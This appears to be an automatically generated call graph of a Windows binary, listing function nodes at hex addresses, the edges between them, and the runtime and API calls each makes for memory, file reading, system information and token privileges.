74246 cf144d 74242->74246 74243 cf14f4 74243->74189 74253 d11d73 5 API calls __EH_prolog 74243->74253 74246->74243 74248 cf1507 74246->74248 74264 cf1265 5 API calls 2 library calls 74246->74264 74265 d304d2 74246->74265 74271 cf1524 malloc _CxxThrowException __EH_prolog ctype 74246->74271 74249 cf2fec 3 API calls 74248->74249 74249->74243 74273 cf9313 GetCurrentProcess OpenProcessToken 74250->74273 74253->74192 74254->74194 74256 cf27c7 74255->74256 74260 cf27e3 74255->74260 74257 cf1e0c ctype 2 API calls 74256->74257 74256->74260 74258 cf27da 74257->74258 74280 cf1e40 free 74258->74280 74261 cf1e40 free 74260->74261 74261->74200 74262->74204 74263->74240 74264->74246 74266 d30513 74265->74266 74267 d304df 74265->74267 74266->74246 74268 d304e8 _CxxThrowException 74267->74268 74269 d304fd 74267->74269 74268->74269 74272 d30551 malloc _CxxThrowException free memcpy ctype 74269->74272 74271->74246 74272->74266 74274 cf933a LookupPrivilegeValueW 74273->74274 74275 cf9390 74273->74275 74276 cf934c AdjustTokenPrivileges 74274->74276 74277 cf9382 74274->74277 74276->74277 74278 cf9372 GetLastError 74276->74278 74279 cf9385 CloseHandle 74277->74279 74278->74279 74279->74275 74280->74260 74281 d0459e 74282 d045bc 74281->74282 74283 d045ab 74281->74283 74283->74282 74287 d045c3 74283->74287 74288 d045cd __EH_prolog 74287->74288 74316 d079b2 free ctype 74288->74316 74290 d045e8 74317 cf1e40 free 74290->74317 74292 d045f3 74318 d22db9 free ctype 74292->74318 74294 d04609 74319 cf1e40 free 74294->74319 74296 d04610 74320 cf1e40 free 74296->74320 74298 d0461b 74321 cf1e40 free 74298->74321 74300 d04626 74322 d0794c free ctype 74300->74322 74302 d04638 74323 d22db9 free ctype 74302->74323 74304 d0465b 74324 cf1e40 free 74304->74324 74306 d0468e 74325 cf1e40 free 74306->74325 74308 d046ae 74326 d04733 free __EH_prolog ctype 74308->74326 74310 d046be 74327 cf1e40 free 74310->74327 74312 d046e8 74328 cf1e40 free 74312->74328 74314 d045b6 74315 cf1e40 free 74314->74315 74315->74282 74316->74290 74317->74292 74318->74294 74319->74296 74320->74298 74321->74300 74322->74302 74323->74304 74324->74306 74325->74308 74326->74310 74327->74312 74328->74314 74329 d30343 74334 d3035f 74329->74334 74332 d30358 74335 d30369 __EH_prolog 74334->74335 74351 d0139e 74335->74351 74343 d303a2 74368 cf1e40 free 74343->74368 74345 d303aa 74369 d303d8 74345->74369 74350 cf1e40 free 74350->74332 74352 d013b3 74351->74352 74353 d013ae 74351->74353 74355 d301c4 74352->74355 74385 d87ea0 SetEvent GetLastError 74353->74385 74356 d301ce __EH_prolog 74355->74356 74359 d30203 74356->74359 74387 cf1e40 free 74356->74387 74358 d3020b 74361 d30143 74358->74361 74386 cf1e40 free 74359->74386 74366 d3014d __EH_prolog 74361->74366 74362 d30182 74388 cf1e40 free 74362->74388 74364 d3018a 74367 cf1e40 free 74364->74367 74366->74362 74389 cf1e40 free 74366->74389 74367->74343 74368->74345 74370 d303e2 __EH_prolog 74369->74370 74371 d0139e ctype 2 API calls 74370->74371 74372 d303fb 74371->74372 74390 d87d50 74372->74390 74374 d30403 74375 d87d50 ctype 2 API calls 74374->74375 74376 d3040b 74375->74376 74377 d87d50 ctype 2 API calls 74376->74377 74378 d303b7 74377->74378 74379 d3004a 74378->74379 74380 d30054 __EH_prolog 74379->74380 74396 cf1e40 free 74380->74396 74382 d30067 74397 cf1e40 free 74382->74397 74384 d3006f 74384->74332 74384->74350 74385->74352 74386->74358 74387->74356 74388->74364 74389->74366 74391 d87d59 CloseHandle 74390->74391 74392 d87d7b 74390->74392 74393 d87d64 GetLastError 74391->74393 74394 d87d75 74391->74394 74392->74374 74393->74392 74395 d87d6e 74393->74395 74394->74392 74395->74374 74396->74382 74397->74384 74398 d76bc6 74399 d76bcd 74398->74399 74400 d76bca 74398->74400 74399->74400 74401 d76bd1 malloc 74399->74401 74401->74400 74402 d1d3c2 74403 d1d3e9 74402->74403 74404 cf965d VariantClear 74403->74404 74405 d1d42a 74404->74405 74406 d1d883 2 API calls 74405->74406 74407 d1d4b1 74406->74407 74493 d18d4a 74407->74493 74410 d18b05 VariantClear 74412 d1d4e3 74410->74412 74510 d12a72 74412->74510 74414 cf2fec 3 API calls 74415 d1d594 74414->74415 74416 d1d742 74415->74416 74417 d1d5cd 74415->74417 74541 d1cd49 malloc _CxxThrowException free 74416->74541 74418 d1d7d9 74417->74418 74514 d19317 74417->74514 74544 cf1e40 free 74418->74544 74421 d1d754 74424 cf2fec 3 API calls 74421->74424 74427 d1d763 74424->74427 74425 d1d7e1 74545 cf1e40 free 74425->74545 74426 d1d5f1 74430 d304d2 5 API calls 74426->74430 74542 cf1e40 free 74427->74542 74429 d1d7e9 74432 d1326b free 74429->74432 74433 d1d5f9 74430->74433 74444 d1d69a 74432->74444 74520 d1e332 74433->74520 74434 d1d76b 74543 cf1e40 free 74434->74543 74437 d1d773 74439 d1326b free 74437->74439 74439->74444 74441 d1d610 74527 cf1e40 free 74441->74527 74443 d1d618 74528 d1326b 74443->74528 74446 d1d2a8 74446->74444 74468 d1d883 74446->74468 74449 cf2fec 3 API calls 74450 d1d361 74449->74450 74451 cf2fec 3 API calls 74450->74451 74469 d1d88d __EH_prolog 74468->74469 74470 cf2e04 2 API calls 74469->74470 74471 d1d8c6 74470->74471 74472 cf2e04 2 API calls 74471->74472 74473 d1d8d2 74472->74473 74474 cf2e04 2 API calls 74473->74474 74475 d1d8de 74474->74475 74546 d12b63 74475->74546 74478 d12b63 2 API calls 74479 d1d34f 74478->74479 74479->74449 74494 d18d54 __EH_prolog 74493->74494 74495 d18da4 74494->74495 74554 cf2b55 malloc _CxxThrowException free _CxxThrowException ctype 74494->74554 74496 d18e15 74495->74496 74497 d18e09 74495->74497 74504 d18e11 74495->74504 74499 d18e2d 74496->74499 74500 d18e5e 74496->74500 74501 d18e21 74496->74501 74498 cf965d VariantClear 74497->74498 74498->74504 74499->74500 74502 d18e2b 74499->74502 74503 cf965d VariantClear 74500->74503 74555 cf3097 malloc _CxxThrowException free SysStringLen ctype 74501->74555 74506 cf965d VariantClear 74502->74506 74503->74504 74504->74410 74508 d18e47 74506->74508 74508->74504 74556 d18e7c 6 API calls __EH_prolog 74508->74556 74511 d12a82 74510->74511 74512 cf2e04 2 API calls 74511->74512 74513 d12a9f 74512->74513 74513->74414 74518 d19321 __EH_prolog 74514->74518 74515 d19360 74516 cf965d VariantClear 74515->74516 74517 d193d0 74516->74517 74517->74418 74517->74426 74518->74515 74557 cf9686 VariantClear 74518->74557 74521 d1e33c __EH_prolog 74520->74521 74522 cf1e0c ctype 2 API calls 74521->74522 74523 d1e34a 74522->74523 74524 d1d608 74523->74524 74558 d1e3d1 malloc _CxxThrowException __EH_prolog 74523->74558 74526 cf1e40 free 74524->74526 74526->74441 74527->74443 74529 d13275 __EH_prolog 74528->74529 74559 d12c0b 74529->74559 74532 d12c0b ctype free 74533 d13296 74532->74533 74564 cf1e40 free 74533->74564 74535 d1329e 74565 cf1e40 free 74535->74565 74537 d132a6 74566 cf1e40 free 74537->74566 74539 d132ae 74539->74446 74541->74421 74542->74434 74543->74437 74544->74425 74545->74429 74547 d12b6d __EH_prolog 74546->74547 74548 cf2e04 2 API calls 74547->74548 74549 d12b9a 74548->74549 74550 cf2e04 2 API calls 74549->74550 74551 d12ba5 74550->74551 74551->74478 74554->74495 74555->74502 74556->74504 74557->74515 74558->74524 74567 cf1e40 free 74559->74567 74561 d12c16 74568 cf1e40 free 74561->74568 74563 d12c1e 74563->74532 74564->74535 74565->74537 74566->74539 74567->74561 74568->74563 74569 d1a7c5 74573 d1a7e9 74569->74573 74578 d1a96b 74569->74578 74570 d1ade3 74674 cf1e40 free 74570->74674 74572 d1a952 74572->74578 74655 d1e0b0 6 API calls 74572->74655 74573->74572 74595 d304d2 5 API calls 74573->74595 74654 d1e0b0 6 API calls 74573->74654 74574 d1adeb 74675 cf1e40 free 74574->74675 74578->74570 74590 d1ac1e 74578->74590 74602 d1ac6c 74578->74602 74616 d1ad88 74578->74616 74620 d1ad17 74578->74620 74622 d1acbc 74578->74622 74636 d0101c 74578->74636 74639 d198f2 74578->74639 74645 d1cc6f 74578->74645 74656 d19531 5 API calls __EH_prolog 74578->74656 74657 d180c1 malloc _CxxThrowException __EH_prolog 74578->74657 74658 d1c820 5 API calls 2 library calls 74578->74658 74659 d1814d 6 API calls 74578->74659 74660 d18125 free ctype 74578->74660 74579 d1adf3 74580 d1ae99 74579->74580 74589 d304d2 malloc _CxxThrowException free _CxxThrowException memcpy 74579->74589 74581 cf1e0c ctype 2 API calls 74580->74581 74584 d1aea9 memset memset 74581->74584 74586 d1aedd 74584->74586 74585 d1ac26 74662 cf1e40 free 74585->74662 74676 cf1e40 free 74586->74676 74589->74579 74661 cf1e40 free 74590->74661 74592 d1aee5 74677 cf1e40 free 74592->74677 74595->74573 74596 d1aef0 74678 cf1e40 free 74596->74678 74599 d1c430 74680 cf1e40 free 74599->74680 74663 cf1e40 free 74602->74663 74603 d1c438 74681 cf1e40 free 74603->74681 74607 d1c443 74682 cf1e40 free 74607->74682 74608 d1ac85 74664 cf1e40 free 74608->74664 74611 d1c44e 74683 cf1e40 free 74611->74683 74612 d1ac2e 74679 cf1e40 free 74612->74679 74614 d1c459 74671 d18125 free ctype 74616->74671 74668 d18125 free ctype 74620->74668 74621 d1ad93 74672 cf1e40 free 74621->74672 74665 d18125 free ctype 74622->74665 74626 d1acc7 74666 cf1e40 free 74626->74666 74627 d1ad3c 74669 cf1e40 free 74627->74669 74628 d1adac 74673 cf1e40 free 74628->74673 74632 d1ace0 74667 cf1e40 free 74632->74667 74633 d1ad55 74670 cf1e40 free 74633->74670 74684 cfb95a 74636->74684 74640 d198fc __EH_prolog 74639->74640 74691 d19987 74640->74691 74642 d19970 74642->74578 74644 d19911 74644->74642 74695 d1ef8d 12 API calls 2 library calls 74644->74695 74735 d3cf91 74645->74735 74743 d3f445 74645->74743 74749 d35505 74645->74749 74646 d1cccb 74646->74578 74647 d1cc8b 74647->74646 74753 d1979e VariantClear __EH_prolog 74647->74753 74649 d1ccb1 74649->74646 74754 d1cae9 VariantClear 74649->74754 74654->74573 74655->74578 74656->74578 74657->74578 74658->74578 74659->74578 74660->74578 74661->74585 74662->74612 74663->74608 74664->74612 74665->74626 74666->74632 74667->74612 74668->74627 74669->74633 74670->74612 74671->74621 74672->74628 74673->74612 74674->74574 74675->74579 74676->74592 74677->74596 74678->74612 74679->74599 74680->74603 74681->74607 74682->74611 74683->74614 74686 cfb969 74684->74686 74689 cfb97d 74684->74689 74685 cf7731 5 API calls 74687 cfb9ee 74685->74687 74686->74685 74686->74689 74687->74689 74690 cfb8ec GetLastError 74687->74690 74689->74578 74690->74689 74692 d19991 __EH_prolog 74691->74692 74696 d480aa 74692->74696 74693 d199a8 74693->74644 74695->74642 74697 d480b4 __EH_prolog 74696->74697 74698 cf1e0c ctype 2 API calls 74697->74698 74699 d480bf 74698->74699 74700 d480d3 74699->74700 74702 d3bdb5 74699->74702 74700->74693 74703 d3bdbf __EH_prolog 74702->74703 74708 d3be69 74703->74708 74705 d3bdef 74706 cf2e04 2 API calls 74705->74706 74707 d3be16 74706->74707 74707->74700 74709 d3be73 __EH_prolog 74708->74709 74712 d35e2b 74709->74712 74711 d3be7f 74711->74705 74713 d35e35 __EH_prolog 74712->74713 74718 d308b6 74713->74718 74715 d35e41 74723 d0dfc9 malloc _CxxThrowException __EH_prolog 74715->74723 74717 d35e57 74717->74711 74724 cf9c60 74718->74724 74720 d308c4 74729 cf9c8f GetModuleHandleA GetProcAddress 74720->74729 74722 d308f3 __aulldiv 74722->74715 74723->74717 74734 cf9c4d GetCurrentProcess GetProcessAffinityMask 74724->74734 74726 cf9c6e 74727 cf9c80 GetSystemInfo 74726->74727 74728 cf9c79 74726->74728 74727->74720 74728->74720 74730 cf9cef GlobalMemoryStatus 74729->74730 74731 cf9cc4 GlobalMemoryStatusEx 74729->74731 74732 cf9d08 74730->74732 74731->74730 74733 cf9cce 74731->74733 74732->74733 74733->74722 74734->74726 74736 d3cf9b __EH_prolog 74735->74736 74737 d3f445 14 API calls 74736->74737 74738 d3d018 74737->74738 74741 d3d01f 74738->74741 74755 d41511 74738->74755 74740 d3d08b 74740->74741 74761 d42c5d 11 API calls 2 library calls 74740->74761 74741->74647 74744 d3f455 74743->74744 75142 d01092 74744->75142 74747 d3f478 74747->74647 74750 d3550f __EH_prolog 74749->74750 75155 d34e8a 74750->75155 74753->74649 74754->74646 74756 d4151b __EH_prolog 74755->74756 74762 d410d3 74756->74762 74759 d41552 _CxxThrowException 74759->74740 74760 d41589 74759->74760 74760->74740 74761->74741 74763 d410dd __EH_prolog 74762->74763 74794 d3d1b7 74763->74794 74765 d412ef 74765->74759 74765->74760 74766 d411f4 74766->74765 74793 cfb95a 6 API calls 74766->74793 74767 d4139e 74767->74765 74769 d413c4 74767->74769 74770 cf1e0c ctype 2 API calls 74767->74770 74801 d01168 74769->74801 74770->74769 74772 d01168 10 API calls 74772->74766 74773 d413de 74845 cf1e40 free 74773->74845 74775 d413da 74775->74773 74777 d413f9 74775->74777 74839 d3ef67 _CxxThrowException 74775->74839 74804 d3f047 74777->74804 74780 d414ba 74843 d40943 50 API calls 2 library calls 74780->74843 74781 d41450 74808 d406ae 74781->74808 74785 d414e7 74844 d22db9 free ctype 74785->74844 74793->74767 74846 d3d23c 74794->74846 74796 d3d1ed 74853 cf1e40 free 74796->74853 74798 d3d209 74854 cf1e40 free 74798->74854 74800 d3d21c 74800->74765 74800->74766 74800->74772 74882 d0111c 74801->74882 74805 d3f063 74804->74805 74806 d3f072 74805->74806 74918 d3ef67 _CxxThrowException 74805->74918 74806->74780 74806->74781 74840 d3ef67 _CxxThrowException 74806->74840 74809 d406b8 __EH_prolog 74808->74809 74919 d403f4 74809->74919 74811 d40877 75040 d3b8dc 74811->75040 74815 d408e3 _CxxThrowException 74818 d408f7 74815->74818 74821 d3b8dc ctype free 74818->74821 74819 cf429a 3 API calls 74837 d40715 74819->74837 74823 d40914 74821->74823 75050 cf1e40 free 74823->75050 74824 cf1e0c ctype 2 API calls 74824->74837 74828 d4091c 75051 cf1e40 free 74828->75051 74832 d40924 74837->74811 74837->74815 74837->74818 74837->74819 74837->74824 74838 d3ef67 _CxxThrowException 74837->74838 74949 d012a5 74837->74949 74954 d381ec 74837->74954 74838->74837 74839->74777 74840->74781 74843->74785 74844->74773 74845->74765 74855 d3d2b8 74846->74855 74849 d3d25e 74872 cf1e40 free 74849->74872 74852 d3d275 74852->74796 74853->74798 74854->74800 74874 cf1e40 free 74855->74874 74857 d3d2c8 74875 cf1e40 free 74857->74875 74859 d3d2dc 74876 cf1e40 free 74859->74876 74861 d3d2e7 74877 cf1e40 free 74861->74877 74863 d3d2f2 74878 cf1e40 free 74863->74878 74865 d3d2fd 74879 cf1e40 free 74865->74879 74867 d3d308 74880 cf1e40 free 74867->74880 74869 d3d313 74870 d3d246 74869->74870 74881 cf1e40 free 74869->74881 74870->74849 74873 cf1e40 free 74870->74873 74872->74852 74873->74849 74874->74857 74875->74859 74876->74861 74877->74863 74878->74865 74879->74867 74880->74869 74881->74870 74883 d01130 74882->74883 74884 d0115f 74883->74884 74887 cfb668 74883->74887 74906 cfd331 74883->74906 74884->74775 74896 cfb675 74887->74896 74888 cfb864 74910 cf7b7c 74888->74910 74891 cfb8aa GetLastError 74892 cfb6aa 74891->74892 74892->74883 74893 cfb81b 74893->74892 74897 cfb839 memcpy 74893->74897 74894 cf7731 5 API calls 74894->74896 74895 cfb7e7 74895->74888 74899 cf7731 5 API calls 74895->74899 74896->74888 74896->74892 74896->74893 74896->74894 74896->74895 74898 cfb811 74896->74898 74900 cfb7ad 74896->74900 74915 cf7b4f ReadFile 74896->74915 74897->74892 74916 cfb8ec GetLastError 74898->74916 74902 cfb80d 74899->74902 74900->74896 74905 cfb8c7 74900->74905 74914 d76a20 VirtualAlloc 74900->74914 74902->74888 74902->74898 74905->74892 74907 cfd355 74906->74907 74908 cfd374 74907->74908 74909 cfb668 10 API calls 74907->74909 74908->74883 74909->74908 74911 cf7b89 74910->74911 74917 cf7b4f ReadFile 74911->74917 74913 cf7b9a 74913->74891 74913->74892 74914->74900 74915->74896 74916->74892 74917->74913 74918->74806 74920 d3f047 _CxxThrowException 74919->74920 74921 d40407 74920->74921 74923 d3f047 _CxxThrowException 74921->74923 74924 d40475 74921->74924 74922 d4049a 74925 d404b8 74922->74925 75058 d4159a malloc _CxxThrowException free ctype 74922->75058 74926 d40421 74923->74926 74924->74922 75057 d3fa3f 22 API calls 2 library calls 74924->75057 74928 d404e8 74925->74928 74929 d404cd 74925->74929 74930 d4043e 74926->74930 75054 d3ef67 _CxxThrowException 74926->75054 75060 d47c4a malloc _CxxThrowException free ctype 74928->75060 75059 d3fff0 9 API calls 2 library calls 74929->75059 75055 d3f93c 7 API calls 2 library calls 74930->75055 74931 d40492 74935 d3f047 _CxxThrowException 74931->74935 74935->74922 74936 d404f3 74943 d404e3 74936->74943 75061 d0089e malloc _CxxThrowException free _CxxThrowException memcpy 74936->75061 74938 d404db 74940 d3f047 _CxxThrowException 74938->74940 74940->74943 74941 d4046d 74942 d3f047 _CxxThrowException 74941->74942 74942->74924 74944 d4054a 74943->74944 75062 d3ef67 _CxxThrowException 74943->75062 74944->74837 74945 d40446 74945->74941 75056 d3ef67 _CxxThrowException 74945->75056 74950 d304d2 5 API calls 74949->74950 74951 d012ad 74950->74951 74952 cf1e0c ctype 2 API calls 74951->74952 74953 d012b4 74952->74953 74953->74837 74955 d381f6 __EH_prolog 74954->74955 75063 d3f749 74955->75063 74958 d3823b 75041 d3b8e6 __EH_prolog 75040->75041 75140 cf1e40 free 75041->75140 75043 d3b90d 75141 d2e647 free ctype 75043->75141 75045 d3b915 75050->74828 75051->74832 75054->74930 75055->74945 75056->74941 75057->74931 75058->74925 75059->74938 75060->74936 75061->74936 75062->74944 75064 d3f779 75063->75064 75065 d3f782 _CxxThrowException 75064->75065 75066 d3f797 75064->75066 75065->75066 75066->74958 75140->75043 75141->75045 75144 cfb95a 6 API calls 75142->75144 75143 d010aa 75143->74747 75145 d3f1b2 75143->75145 75144->75143 75146 d3f1bc __EH_prolog 75145->75146 75147 d01168 10 API calls 75146->75147 75149 d3f1d3 75147->75149 75148 d3f1e6 75148->74747 75149->75148 75150 d3f231 memcpy 75149->75150 75151 d3f21c _CxxThrowException 75149->75151 75154 d3f24c 75150->75154 75151->75150 75152 d3f2f0 memmove 75152->75154 75153 d3f31a memcpy 75153->75148 75154->75148 75154->75152 75154->75153 75156 d34e94 __EH_prolog 75155->75156 75157 cf2e04 2 API calls 75156->75157 75260 d34f1d 75156->75260 75158 d34ed7 75157->75158 75287 d07fc5 75158->75287 75160 d34f37 75162 d34f63 75160->75162 75163 d34f41 75160->75163 75161 d34f0a 75164 cf965d VariantClear 75161->75164 75166 cf2f88 3 API calls 75162->75166 75165 cf965d VariantClear 75163->75165 75167 d34f15 75164->75167 75168 d34f4c 75165->75168 75169 d34f71 75166->75169 75308 cf1e40 free 75167->75308 75309 cf1e40 free 75168->75309 75172 cf965d VariantClear 75169->75172 75173 d34f80 75172->75173 75310 d05bcf malloc _CxxThrowException 75173->75310 75175 d34f9a 75176 cf2e47 2 API calls 75175->75176 75177 d34fad 75176->75177 75178 cf2f1c 2 API calls 75177->75178 75179 d34fbd 75178->75179 75180 cf2e04 2 API calls 75179->75180 75181 d34fd1 75180->75181 75182 cf2e04 2 API calls 75181->75182 75190 d34fdd 75182->75190 75183 d35404 75355 cf1e40 free 75183->75355 75185 d3540c 75356 cf1e40 free 75185->75356 75187 d35414 75357 cf1e40 free 75187->75357 75190->75183 75311 d05bcf malloc _CxxThrowException 75190->75311 75191 d35099 75193 cf2da9 2 API calls 75191->75193 75192 d3541c 75358 cf1e40 free 75192->75358 75195 d350a9 75193->75195 75197 cf2fec 3 API calls 75195->75197 75196 d35424 75359 cf1e40 free 75196->75359 75199 d350b6 75197->75199 75312 cf1e40 free 75199->75312 75200 d3542c 75360 cf1e40 free 75200->75360 75203 d350be 75313 cf1e40 free 75203->75313 75205 d350cd 75206 cf2f88 3 API calls 75205->75206 75207 d350e3 75206->75207 75208 d350f1 75207->75208 75209 d35100 75207->75209 75314 cf30ea 75208->75314 75320 cf3044 malloc _CxxThrowException free ctype 75209->75320 75212 d350fe 75321 d01029 6 API calls 75212->75321 75214 d3511a 75215 d35120 75214->75215 75216 d3516b 75214->75216 75322 cf1e40 free 75215->75322 75328 d0089e malloc _CxxThrowException free _CxxThrowException memcpy 75216->75328 75219 d35128 75323 cf1e40 free 75219->75323 75220 d35187 75223 d304d2 5 API calls 75220->75223 75222 d35130 75324 cf1e40 free 75222->75324 75225 d351ba 75223->75225 75329 d30516 malloc _CxxThrowException ctype 75225->75329 75226 d35138 75325 cf1e40 free 75226->75325 75229 d351c5 75233 d351f5 75229->75233 75234 d3522d 75229->75234 75230 d35140 75326 cf1e40 free 75230->75326 75232 d35148 75327 cf1e40 free 75232->75327 75330 cf1e40 free 75233->75330 75236 cf2e04 2 API calls 75234->75236 75282 d35235 75236->75282 75238 d351fd 75331 cf1e40 free 75238->75331 75241 d35205 75332 cf1e40 free 75241->75332 75242 d3532e 75341 cf1e40 free 75242->75341 75245 d3520d 75333 cf1e40 free 75245->75333 75246 d35347 75246->75183 75248 d35358 75246->75248 75342 cf1e40 free 75248->75342 75249 d35215 75334 cf1e40 free 75249->75334 75251 d353a3 75348 cf1e40 free 75251->75348 75253 d35360 75343 cf1e40 free 75253->75343 75254 d3521d 75335 cf1e40 free 75254->75335 75258 d35368 75344 cf1e40 free 75258->75344 75260->74647 75262 d353bc 75349 cf1e40 free 75262->75349 75263 d35370 75345 cf1e40 free 75263->75345 75267 d353c4 75350 cf1e40 free 75267->75350 75268 d35378 75270 d304d2 5 API calls 75270->75282 75272 d353cc 75351 cf1e40 free 75272->75351 75276 d353d4 75352 cf1e40 free 75276->75352 75279 d353dc 75282->75242 75282->75251 75282->75270 75285 cf2e04 2 API calls 75282->75285 75336 d3545c 5 API calls 2 library calls 75282->75336 75337 d01029 6 API calls 75282->75337 75338 d0089e malloc _CxxThrowException free _CxxThrowException memcpy 75282->75338 75339 d30516 malloc _CxxThrowException ctype 75282->75339 75340 cf1e40 free 75282->75340 75285->75282 75290 d07fcf __EH_prolog 75287->75290 75288 d0800a 75370 cf9736 VariantClear 75288->75370 75289 d08061 75292 d0805c 75289->75292 75306 d08025 75289->75306 75290->75289 75290->75292 75293 d08019 75290->75293 75296 d07ff4 75290->75296 75369 cf9630 VariantClear 75292->75369 75293->75296 75297 d0801e 75293->75297 75294 d080b8 75299 cf965d VariantClear 75294->75299 75296->75288 75361 cf950d 75296->75361 75300 d08042 75297->75300 75301 d08022 75297->75301 75303 d080c0 75299->75303 75367 cf9597 VariantClear 75300->75367 75304 d08032 75301->75304 75301->75306 75303->75160 75303->75161 75366 cf9604 VariantClear 75304->75366 75306->75288 75368 cf95df VariantClear 75306->75368 75308->75260 75309->75260 75310->75175 75311->75191 75312->75203 75313->75205 75315 cf30fd 75314->75315 75315->75315 75316 cf1e0c ctype 2 API calls 75315->75316 75317 cf311d 75315->75317 75318 cf3113 75316->75318 75317->75212 75377 cf1e40 free 75318->75377 75320->75212 75321->75214 75322->75219 75323->75222 75324->75226 75325->75230 75326->75232 75327->75260 75328->75220 75329->75229 75330->75238 75331->75241 75332->75245 75333->75249 75334->75254 75335->75260 75336->75282 75337->75282 75338->75282 75339->75282 75340->75282 75341->75246 75342->75253 75343->75258 75344->75263 75345->75268 75348->75262 75349->75267 75350->75272 75351->75276 75352->75279 75355->75185 75356->75187 75357->75192 75358->75196 75359->75200 75360->75260 75371 cf9767 75361->75371 75363 cf9518 SysAllocStringLen 75364 cf954f 75363->75364 75365 cf9539 _CxxThrowException 75363->75365 75364->75288 75365->75364 75366->75288 75367->75288 75368->75288 75369->75288 75370->75294 75372 cf9779 75371->75372 75373 cf9770 75371->75373 75376 cf9686 VariantClear 75372->75376 75373->75363 75375 cf9780 75375->75363 75376->75375 75377->75317 75378 cfb5d9 75379 cfb5f7 75378->75379 75380 cfb5e6 75378->75380 75380->75379 75384 cfb5fe 75380->75384 75385 cfb608 __EH_prolog 75384->75385 75391 d76a40 VirtualFree 75385->75391 75387 cfb63d 75388 cf764c CloseHandle 75387->75388 75389 cfb5f1 75388->75389 75390 cf1e40 free 75389->75390 75390->75379 75391->75387 75392 d1d948 75422 d1dac7 75392->75422 75394 d1d94f 75395 cf2e04 2 API calls 75394->75395 75396 d1d97b 75395->75396 75397 cf2e04 2 API calls 75396->75397 75398 d1d987 75397->75398 75401 d1d9e7 75398->75401 75430 cf6404 75398->75430 75403 d1da0f 75401->75403 75421 d1da36 75401->75421 75455 cf1e40 free 75403->75455 75406 d1d9bf 75453 cf1e40 free 75406->75453 75407 d1da94 75459 cf1e40 free 75407->75459 75408 d1da17 75456 cf1e40 free 75408->75456 75412 d1d9c7 75454 cf1e40 free 75412->75454 75413 d1da9c 75460 cf1e40 free 75413->75460 75414 cf2da9 2 API calls 75414->75421 75417 d304d2 5 API calls 75417->75421 75418 d1d9cf 75421->75407 75421->75414 75421->75417 75457 cf1524 malloc _CxxThrowException __EH_prolog ctype 75421->75457 75458 cf1e40 free 75421->75458 75423 d1dad1 __EH_prolog 75422->75423 75424 cf2e04 2 API calls 75423->75424 75425 d1db33 75424->75425 75426 cf2e04 2 API calls 75425->75426 75427 d1db3f 75426->75427 75428 cf2e04 2 API calls 75427->75428 75429 d1db55 75428->75429 75429->75394 75461 cf631f 75430->75461 75433 cf2f88 3 API calls 75434 cf6423 75433->75434 75435 cf2f88 3 API calls 75434->75435 75436 cf643d 75435->75436 75437 d07e5a 75436->75437 75438 d07e64 __EH_prolog 75437->75438 75517 d08179 75438->75517 75441 d17ebb free 75442 d07e7f 75441->75442 75443 cf2fec 3 API calls 75442->75443 75444 d07e9a 75443->75444 75445 cf2da9 2 API calls 75444->75445 75446 d07ea7 75445->75446 75447 cf6c72 44 API calls 75446->75447 75448 d07eb7 75447->75448 75522 cf1e40 free 75448->75522 75450 d07ecb 75451 d07ed8 75450->75451 75523 cf757d GetLastError 75450->75523 75451->75401 75451->75406 75453->75412 75454->75418 75455->75408 75456->75418 75457->75421 75458->75421 75459->75413 75460->75418 75462 cf9245 75461->75462 75465 cf90da 75462->75465 75466 cf90e4 __EH_prolog 75465->75466 75467 cf2f88 3 API calls 75466->75467 75469 cf90f7 75467->75469 75468 cf915d 75470 cf2e04 2 API calls 75468->75470 75469->75468 75474 cf9109 75469->75474 75471 cf9165 75470->75471 75472 cf91be 75471->75472 75475 cf9174 75471->75475 75511 cf6332 6 API calls 2 library calls 75472->75511 75477 cf2e47 2 API calls 75474->75477 75485 cf6414 75474->75485 75478 cf2f88 3 API calls 75475->75478 75476 cf917d 75504 cf91ca 75476->75504 75509 cf859e malloc _CxxThrowException free _CxxThrowException 75476->75509 75479 cf9122 75477->75479 75478->75476 75506 cf8f57 memmove 75479->75506 75483 cf9185 75488 cf2e04 2 API calls 75483->75488 75484 cf914d 75508 cf1e40 free 75484->75508 75485->75433 75485->75434 75487 cf912e 75487->75484 75507 cf31e5 malloc _CxxThrowException free _CxxThrowException 75487->75507 75490 cf9197 75488->75490 75491 cf919f 75490->75491 75492 cf91ce 75490->75492 75493 cf91b9 75491->75493 75510 cf1089 malloc _CxxThrowException free _CxxThrowException 75491->75510 75494 cf2f88 3 API calls 75492->75494 75512 cf3199 malloc _CxxThrowException free _CxxThrowException 75493->75512 75494->75493 75497 cf91e6 75513 cf8f57 memmove 75497->75513 75499 cf91ee 75500 cf91f2 75499->75500 75501 cf2fec 3 API calls 75499->75501 75515 cf1e40 free 75500->75515 75503 cf9212 75501->75503 75514 cf31e5 malloc _CxxThrowException free _CxxThrowException 75503->75514 75516 cf1e40 free 75504->75516 75506->75487 75507->75484 75508->75485 75509->75483 75510->75493 75511->75476 75512->75497 75513->75499 75514->75500 75515->75504 75516->75485 75520 d08906 75517->75520 75518 d07e77 75518->75441 75520->75518 75524 d08804 free ctype 75520->75524 75525 cf1e40 free 75520->75525 75522->75450 75523->75451 75524->75520 75525->75520 75526 cf42d1 75527 cf42bd 75526->75527 75528 cf42c5 75527->75528 75529 cf1e0c ctype 2 API calls 75527->75529 75529->75528 75530 d38eb1 75535 d38ed1 75530->75535 75533 d38ec9 75536 d38edb __EH_prolog 75535->75536 75544 d39267 75536->75544 75540 d38efd 75549 d2e5f1 free ctype 75540->75549 75542 d38eb9 75542->75533 75543 cf1e40 free 75542->75543 75543->75533 75545 d39271 __EH_prolog 75544->75545 75550 cf1e40 free 75545->75550 75547 d38ef1 75548 d3922b free CloseHandle GetLastError ctype 75547->75548 75548->75540 75549->75542 75550->75547 75551 d2adb7 75552 d2adc1 __EH_prolog 75551->75552 75567 cf26dd 75552->75567 75554 d2ae1d 75555 cf2e04 2 API calls 75554->75555 75556 d2ae38 75555->75556 75557 cf2e04 2 API calls 75556->75557 75558 d2ae44 75557->75558 75559 cf2e04 2 API calls 75558->75559 75560 d2ae68 75559->75560 75570 d2ad29 75560->75570 75564 d2ae94 75565 cf2e04 2 API calls 75564->75565 75566 d2aeb2 75565->75566 75568 cf1e0c ctype 2 API calls 75567->75568 75569 cf26ea 75568->75569 75569->75554 75571 d2ad33 __EH_prolog 75570->75571 75572 cf2e04 2 API calls 75571->75572 75573 d2ad5f 75572->75573 75574 cf2e04 2 API calls 75573->75574 75575 d2ad72 75574->75575 75576 d2af2d 75575->75576 75577 d2af37 __EH_prolog 75576->75577 75588 d034f4 malloc _CxxThrowException 